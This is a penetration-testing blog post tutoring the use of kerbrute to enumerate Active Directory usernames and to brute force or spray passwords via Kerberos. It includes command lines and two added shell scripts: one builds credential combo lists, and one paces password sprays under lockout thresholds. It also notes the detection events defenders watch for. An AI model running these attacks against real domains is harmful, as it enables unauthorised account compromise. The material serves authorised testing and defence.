The Exploit

Notes from the Front Lines of Penetration Testing

Cool Tools Series: Kerbrute


When I’m looking to enumerate and brute force Active Directory (AD) accounts through Kerberos pre-authentication for cloud and internal network pentests and red team engagements, kerbrute is my go-to tool. 

Kerbrute is an open-source tool that is simple to use, and it places several useful commands at a pentester’s fingertips.

Getting Started

When you run the tool without any arguments you get a general help page:

Kerbrute Help Page

I mostly use userenum and sometimes passwordspray.

User Enumeration

When doing user enumeration you will need a list of potential usernames for kerbrute to validate. I usually use sites like DeHashed and LinkedIn to grab names of employees. Linkedin2username is a great tool for turning a company's LinkedIn employee list into candidate usernames in common formats (first.last, flast, and so on).

I’m doing this in my lab, so here’s an example list. You can use a much larger list as the tool is quick, generally testing thousands of usernames in only a few minutes. 

User list

To gather a list of valid users you will need the domain you are targeting. Usually this is easy to find with something like NetExec:

Using NetExec to find the target domain name.

After finding the domain, you just need to run kerbrute with the userenum flag and the list of users.

Most of the time kerbrute will find the Kerberos servers (usually domain controllers) on its own, because it looks up the domain's KDC through DNS SRV records. If DNS doesn't resolve for the target domain (common when you are using your own resolver on an internal test), use the --dc flag to point it at a specific domain controller.

You will pass the target domain with the -d flag.

./kerbrute userenum -d [Target Domain] [User List] --dc [DC IP]
Using the --dc flag to point kerbrute at a specific domain controller

I also normally use the -o flag, which will save the output to a file for later use.

./kerbrute userenum -d [Target Domain] [User List] --dc [DC IP] -o [Output File]
Using the -o flag to save output to a file

The output file looks the same as the output you see on screen, so a simple combination of grep and awk can pull out the valid usernames.

The userenum mode only sends AS-REQs without pre-authentication data, so no password is ever checked: it does not increment badPwdCount and will not lock accounts out. It is not invisible, though. If the domain audits Kerberos authentication service activity, every probe produces a 4768 (TGT requested) event on the DC, and a burst of 4768 failures with result code 0x6 (unknown principal) is a well-known signature of this technique:

Userenum does not increment the bad password count.

Brute Force

You can use kerbrute to brute force a list of username:password combos from a file or from stdin (pass - as the file name to read stdin). Blank lines, and lines with a blank username or password, are skipped.

The best way to use this, in my opinion, is to test known possible password combos or to test usernames as the password. I don't normally use this mode, but if you want to try usernames as passwords, I would take my output from the userenum step above.

Here is the command to get the list of users from the output:

cat [Output List] | grep "\[+\] VALID USERNAME" | awk -F" " '{print $7}' | awk -F"@" '{print $1}' | sort -u > users-list-confirmed

You can then take this list of users and easily get a colon separated list with the username on both sides with awk:

cat [User List] | awk '{print $0":"$0}' > combo-list
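The grep/awk one-liners above work, but I find it handier to keep them as small shell functions that take the saved userenum output and produce both the confirmed user list and the combo list in one go. The following is an added example written for this post, not code from the original write-up or from the kerbrute project. The sample output is constructed to match the "[+] VALID USERNAME:" line layout kerbrute prints; the host, domain and account names in it are made up.

```shell
#!/bin/sh
# Added example (not from the original post or from kerbrute): turn saved
# "kerbrute userenum ... -o" output into a confirmed user list and into
# username:password combos for "kerbrute bruteforce".

# Constructed sample of a saved userenum run. Names, domain and KDC address
# are invented; the line layout mirrors what kerbrute writes to the -o file.
SAMPLE_USERENUM='2024/03/05 10:12:01 >  Using KDC(s):
2024/03/05 10:12:01 >   10.10.10.5:88

2024/03/05 10:12:01 >  [+] VALID USERNAME:  jsmith@lab.local
2024/03/05 10:12:01 >  [+] VALID USERNAME:  administrator@lab.local
2024/03/05 10:12:02 >  [+] VALID USERNAME:  jsmith@lab.local
2024/03/05 10:12:02 >  Done! Tested 6 usernames (3 valid) in 0.412 seconds'

# Confirmed usernames from kerbrute output on stdin: domain suffix stripped,
# de-duplicated, one per line. The user is the last whitespace-separated
# field of the line, which is more robust than counting to $7 should the
# timestamp prefix ever change.
valid_users() {
    grep 'VALID USERNAME' | awk '{ sub(/@.*/, "", $NF); print $NF }' | sort -u
}

# username:username combos (stdin -> stdout) for the "user as password"
# check. Blank lines are dropped so no empty credential pair is produced.
user_as_password() {
    awk 'NF { print $0 ":" $0 }'
}

# username:password combos for a few candidate passwords, written in
# password-major order: every user is tried with candidate 1 before anyone
# is tried with candidate 2, so one pass over the file costs each account a
# single bad-password count. (awk -v expands backslash escapes, so keep
# backslashes out of the candidates or quote them.)
combos() {
    userfile=$1
    shift
    for pw in "$@"; do
        awk -v pw="$pw" 'NF { print $0 ":" pw }' "$userfile"
    done
}

# Usage against a real saved run:
#   valid_users < enum-output.txt > users-list-confirmed
#   user_as_password < users-list-confirmed > combo-list
#   combos users-list-confirmed 'Winter2024!' 'Welcome1' > combo-list
```

Feed combo-list to `./kerbrute bruteforce --dc [DC IP] -d [Domain] combo-list` exactly as below; the password-major ordering matters because kerbrute works through the file top to bottom, and it is the per-account count of wrong passwords that trips the lockout policy.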

Then all you have to do is run kerbrute:

./kerbrute bruteforce --dc [DC IP] -d [Domain] [Combo List]

Unlike userenum, this mode sends real pre-authentication attempts, so every wrong password increments the account's badPwdCount and can lock it out. It also leaves a trail: each failure is logged on the DC as a 4771 (Kerberos pre-authentication failed) event rather than a 4625 logon failure, and SOCs that tune for it watch for bursts of 4771s from one source. Beware.

Password Spray

You can use kerbrute to spray one password against a list of users. Again, this can lock accounts, so pull the domain password policy before you start (for example with NetExec's --pass-pol option, or net accounts /domain from a domain-joined host) and keep the number of passwords tried per user below the lockout threshold within its observation window.

This will try the same password against each user in the list. If you have the correct password, it will print a success. 

kerbrute passwordspray --dc [DC IP] -d [Domain] [Userlist] [Password]
Kerbrute showing a valid password discovered
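Kerbrute itself sprays one password per invocation and leaves the pacing to you. The wrapper below is an added example written for this post, not part of the original write-up or of kerbrute: it splits a password list into rounds that stay under the lockout threshold, runs one passwordspray per password with --safe, and sleeps a full observation window between rounds so badPwdCount resets. It assumes you already read the threshold and window from the domain policy; the KERBRUTE and SLEEP variables exist only so the plan can be dry-run without a DC.

```shell
#!/bin/sh
# Added example (not from the original post or from kerbrute): pace a
# multi-password spray against the domain lockout policy.
# Assumes THRESHOLD and WINDOW_MIN were taken from the domain password
# policy (e.g. "nxc smb <dc ip> -u <user> -p <pass> --pass-pol").

KERBRUTE=${KERBRUTE:-./kerbrute}   # override with "echo" for a dry run
SLEEP=${SLEEP:-sleep}              # override with ":" to skip the waits

# Print the rounds, one per line: "round N: pw1 pw2 ...".
# Each round sends at most (threshold - 2) passwords to every user, which
# leaves two attempts of margin for a user's own typos. A threshold of 0
# means no lockout policy, so the whole list goes in a single round.
# Passwords must not contain whitespace (the runner splits on it).
plan_rounds() {
    threshold=$1
    pwfile=$2
    if [ "$threshold" -eq 0 ]; then
        per_round=$(grep -c . "$pwfile" || true)
    else
        per_round=$((threshold - 2))
        if [ "$per_round" -lt 1 ]; then
            echo "lockout threshold $threshold is too low to spray safely" >&2
            return 1
        fi
    fi
    awk -v n="$per_round" 'NF {
        buf = (buf == "" ? $0 : buf " " $0)
        if (++c == n) { print "round " ++r ": " buf; buf = ""; c = 0 }
    } END { if (c) print "round " ++r ": " buf }' "$pwfile"
}

# Execute the plan: one "kerbrute passwordspray --safe" per password, then
# a full observation window of sleep before the next round. --safe makes
# kerbrute abort if any account reports as locked out; a non-zero exit from
# kerbrute stops the whole spray.
run_spray() {
    threshold=$1; window_min=$2; domain=$3; dc=$4; userfile=$5; pwfile=$6
    plan_rounds "$threshold" "$pwfile" | {
        first=1
        while IFS= read -r line; do
            [ -n "$first" ] || "$SLEEP" $((window_min * 60))
            first=
            set -- $line          # "round N: pw1 pw2 ..." -> positional params
            shift 2
            for pw in "$@"; do
                "$KERBRUTE" passwordspray --safe -d "$domain" --dc "$dc" \
                    "$userfile" "$pw" || exit 1   # exits the subshell, status 1
            done
        done
    }
}

# Usage (real run):
#   run_spray 5 30 lab.local 10.10.10.5 users-list-confirmed passwords.txt
# Dry run, printing the kerbrute command lines instead of executing them:
#   KERBRUTE=echo SLEEP=: run_spray 5 30 lab.local 10.10.10.5 users.txt pw.txt
```

With a threshold of 5 and a 30-minute window, four passwords become one round of three followed by a 30-minute wait and a round of one; that is slow on purpose, because the alternative is a ticket from the help desk about a few hundred locked accounts.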

Brute Force User

This will take one username and try all the passwords in a list against that user. This can and will lock accounts out. This isn’t something you’ll see very often, as most domains will have a lockout policy. But, if you end up in a situation where you can use it, here’s how.

You will need a list of passwords and a user to target:

./kerbrute bruteuser -d [Domain] --dc [DC IP] [Password List] [Username]

There is a --safe option that makes kerbrute stop as soon as any account comes back as locked out. It works with the spray and brute force modes and is a useful secondary safeguard against widespread lockouts, but it only reacts after the first account is already locked, so it is no substitute for pacing attempts against the policy.

Here’s an example where I used the safe flag and kerbrute stopped after the account came back as locked out.

Safe flag causing Kerbrute to stop after one lock out

Final Thoughts

Kerbrute's ability to enumerate Active Directory users quickly, without lockouts or 4625 logon failures, and to perform password spraying and brute force attacks makes it an important tool for every penetration tester. Just remember that the Kerberos-side events (4768 and 4771) are still there for a blue team that looks for them.

If you enjoyed this tutorial, you may also enjoy my AD Series, including this Using Evil-WinRM to get NTDS Manually post as well.


Andrew Trexler
